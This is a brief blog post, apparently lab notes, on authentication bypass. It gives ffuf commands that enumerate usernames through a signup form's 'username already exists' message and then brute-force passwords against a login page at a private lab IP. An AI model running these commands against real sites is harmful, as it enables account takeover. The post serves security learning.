T4QI
T4QI

Authentication Bypass

18 May 2025 • 1 min read

Username Enumeration

Let’s say that we have a web site http://10.64.156.171/customers/signup

and we want to get the usernames so we can use ffuf by using the following command

BASH 
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.64.156.171/customers/signup -mr "username already exists"

Brute Force

Now we have some user names but how can we benefit from them?

We can brute force the passwords by using ffuf let’s see how

BASH 
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.64.156.171/customers/login -fc 200

Start searching

Enter keywords to search articles.

↑↓ Navigate
Select
ESC Close
CtrlK Shortcut